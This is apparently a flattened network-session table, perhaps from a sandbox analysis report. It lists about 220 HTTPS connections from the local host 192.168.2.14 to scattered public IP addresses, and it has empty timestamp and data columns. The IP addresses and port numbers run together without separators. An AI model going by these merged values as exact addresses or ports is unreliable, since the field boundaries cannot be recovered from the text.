                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20979192.168.2.1442548167.160.117.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20980192.168.2.1452630155.201.113.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20981192.168.2.145209478.196.85.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20982192.168.2.1439434159.236.207.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20983192.168.2.143855624.187.134.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20984192.168.2.1446230178.58.3.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20985192.168.2.1460630150.237.164.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20986192.168.2.1457760208.162.145.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20987192.168.2.1456750180.191.133.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20988192.168.2.1455412176.215.152.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20989192.168.2.1448924181.172.162.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20990192.168.2.144006058.62.135.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20991192.168.2.1460996201.135.26.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20992192.168.2.1447590222.233.135.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20993192.168.2.1458878213.214.173.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20994192.168.2.144742891.120.96.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20995192.168.2.1433730170.248.160.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20996192.168.2.1441836206.46.234.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20997192.168.2.1445340119.112.111.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20998192.168.2.1445060142.168.139.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20999192.168.2.1456504165.217.111.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21000192.168.2.1441572221.11.126.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21001192.168.2.1454514165.165.8.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21002192.168.2.1443874159.38.127.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21003192.168.2.1436102134.38.55.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21004192.168.2.1460146116.20.202.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21005192.168.2.144926481.33.109.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21006192.168.2.1455868112.33.202.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21007192.168.2.145479241.28.76.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21008192.168.2.14474109.59.238.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21009192.168.2.144912884.240.100.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21010192.168.2.1447660115.170.11.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21011192.168.2.1433958211.228.164.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21012192.168.2.144036220.98.185.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21013192.168.2.1443158106.103.44.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21014192.168.2.1451500168.31.238.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21015192.168.2.1457372157.203.211.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21016192.168.2.1445040196.115.74.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21017192.168.2.143606039.66.237.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21018192.168.2.1446118131.32.172.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21019192.168.2.1434610199.164.235.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21020192.168.2.1460996170.15.115.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21021192.168.2.1433402167.105.64.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21022192.168.2.1437416117.7.1.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21023192.168.2.1445916159.91.195.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21024192.168.2.143870659.250.122.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21025192.168.2.1446704144.187.36.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21026192.168.2.144261042.36.65.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21027192.168.2.1449732216.59.74.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21028192.168.2.145397899.255.71.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21029192.168.2.1439242137.188.234.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21030192.168.2.1456438169.104.210.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21031192.168.2.145538490.29.186.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21032192.168.2.1457894205.98.249.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21033192.168.2.144759251.212.250.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21034192.168.2.144390678.190.135.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21035192.168.2.143317046.240.138.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21036192.168.2.145746092.164.18.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21037192.168.2.1442942108.30.146.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21038192.168.2.146082218.78.117.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21039192.168.2.1433246143.243.79.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21040192.168.2.143696234.0.187.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21041192.168.2.1433010161.239.126.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21042192.168.2.1444222118.218.204.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21043192.168.2.1445910144.121.53.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21044192.168.2.1441876201.5.208.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21045192.168.2.143837464.10.104.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21046192.168.2.1454980219.54.227.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21047192.168.2.1436198135.68.118.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21048192.168.2.1454702209.100.83.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21049192.168.2.1454752112.150.16.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21050192.168.2.1433006170.30.147.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21051192.168.2.143778040.95.85.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21052192.168.2.1445232194.41.203.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21053192.168.2.1460286162.158.106.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21054192.168.2.145725820.78.8.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21055192.168.2.1441416203.206.176.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21056192.168.2.144361854.75.129.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21057192.168.2.14421061.79.170.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21058192.168.2.1447190147.66.107.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21059192.168.2.1455548140.63.41.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21060192.168.2.1440736138.185.57.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21061192.168.2.1453600201.26.5.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21062192.168.2.143438431.214.171.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21063192.168.2.1436436171.86.154.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21064192.168.2.1441890113.229.96.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21065192.168.2.143498075.255.223.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21066192.168.2.1443788160.126.222.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21067192.168.2.144635232.54.242.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21068192.168.2.144068023.191.57.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21069192.168.2.1444100187.41.46.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21070192.168.2.144953688.111.31.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21071192.168.2.1445840129.153.253.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21072192.168.2.146034834.3.0.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21073192.168.2.1460508112.27.197.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21074192.168.2.143515889.140.88.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21075192.168.2.1440226173.36.209.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21076192.168.2.145661843.43.217.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21077192.168.2.1447088143.227.233.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21078192.168.2.145217441.215.109.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21079192.168.2.1447514172.38.75.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21080192.168.2.1435532183.192.79.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21081192.168.2.1456574213.58.128.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21082192.168.2.1452806107.189.115.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21083192.168.2.143518647.178.184.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21084192.168.2.1439664163.97.244.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21085192.168.2.1454798113.3.181.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21086192.168.2.145837889.83.215.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21087192.168.2.144372893.123.19.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21088192.168.2.1439618122.250.114.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21089192.168.2.143588886.202.54.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21090192.168.2.144510040.2.84.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21091192.168.2.1440434142.162.53.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21092192.168.2.1457398105.31.149.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21093192.168.2.1442502204.200.148.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21094192.168.2.144047680.208.211.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21095192.168.2.1451964125.142.246.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21096192.168.2.1445644104.155.192.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21097192.168.2.1460484195.4.221.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21098192.168.2.144886862.27.228.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21099192.168.2.1435926142.212.173.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21100192.168.2.1436508115.196.2.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21101192.168.2.145501451.35.95.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21102192.168.2.1438310169.222.38.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21103192.168.2.1458576139.201.164.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21104192.168.2.1460048219.169.230.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21105192.168.2.143974096.245.76.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21106192.168.2.1444798175.25.115.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21107192.168.2.1456094116.110.35.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21108192.168.2.1440508178.249.181.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21109192.168.2.1452316140.233.70.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21110192.168.2.1435194166.92.207.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21111192.168.2.1437218216.85.14.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21112192.168.2.1438916180.16.197.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21113192.168.2.1441796178.143.161.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21114192.168.2.1453672151.185.70.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21115192.168.2.145885869.40.127.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21116192.168.2.143700279.108.74.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21117192.168.2.1441504160.94.162.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21118192.168.2.1440720129.200.231.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21119192.168.2.1438188112.177.72.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21120192.168.2.1454370116.111.248.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21121192.168.2.1451114153.157.5.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21122192.168.2.1442726177.104.111.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21123192.168.2.145012075.55.127.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21124192.168.2.143371434.224.85.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21125192.168.2.143758825.54.27.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21126192.168.2.1451714109.128.163.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21127192.168.2.144489444.236.200.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21128192.168.2.1459644217.53.210.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21129192.168.2.145409827.36.38.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21130192.168.2.1443062223.15.154.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21131192.168.2.1457754201.69.58.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21132192.168.2.145658651.58.242.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21133192.168.2.145586873.26.183.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21134192.168.2.1458580181.183.214.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21135192.168.2.144614837.15.79.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21136192.168.2.145027060.156.25.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21137192.168.2.144230688.254.5.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21138192.168.2.1456788161.24.16.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21139192.168.2.143962276.187.194.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21140192.168.2.145534042.100.107.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21141192.168.2.1433372102.161.197.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21142192.168.2.1458840155.19.26.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21143192.168.2.1435028133.17.44.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21144192.168.2.143745457.251.117.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21145192.168.2.1439346126.105.144.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21146192.168.2.144473234.44.46.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21147192.168.2.1450690152.122.197.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21148192.168.2.1448040165.70.35.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21149192.168.2.1445162200.132.56.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21150192.168.2.1435852123.123.77.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21151192.168.2.145417888.77.238.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21152192.168.2.143821445.173.227.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21153192.168.2.1458798182.164.151.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21154192.168.2.1456906185.179.243.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21155192.168.2.1433668176.36.251.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21156192.168.2.1434604218.65.169.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21157192.168.2.144787857.88.152.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21158192.168.2.1436518160.62.9.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21159192.168.2.1449932128.36.240.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21160192.168.2.1441028129.146.36.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21161192.168.2.144281650.67.195.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21162192.168.2.1453704192.90.147.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21163192.168.2.144591653.78.104.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21164192.168.2.145994682.40.6.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21165192.168.2.1440150104.244.168.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21166192.168.2.1458314160.32.105.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21167192.168.2.1445400157.17.222.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21168192.168.2.144483223.184.96.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21169192.168.2.144235667.104.28.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21170192.168.2.1460100193.56.128.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21171192.168.2.1453934187.226.217.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21172192.168.2.144937477.7.182.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21173192.168.2.145667461.207.53.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21174192.168.2.1439790109.6.72.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21175192.168.2.144956666.170.44.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21176192.168.2.1445908163.73.92.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21177192.168.2.1438606150.232.234.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21178192.168.2.143874488.5.184.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21179192.168.2.143841017.100.138.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21180192.168.2.1451768161.31.175.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21181192.168.2.1458074223.176.69.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21182192.168.2.145793066.167.106.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21183192.168.2.143481685.126.47.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21184192.168.2.14562384.157.198.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21185192.168.2.1443872222.183.81.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21186192.168.2.1437870207.65.19.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21187192.168.2.1441178121.39.245.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21188192.168.2.1443476117.74.97.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21189192.168.2.1444908117.181.57.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21190192.168.2.144223872.73.248.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21191192.168.2.144804047.86.207.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21192192.168.2.144815877.249.201.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21193192.168.2.1432774115.247.91.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21194192.168.2.1460502188.165.128.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21195192.168.2.143807494.102.242.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21196192.168.2.144305657.48.95.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21197192.168.2.1436426126.49.162.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21198192.168.2.1453076170.155.191.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21199192.168.2.1455228167.172.235.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
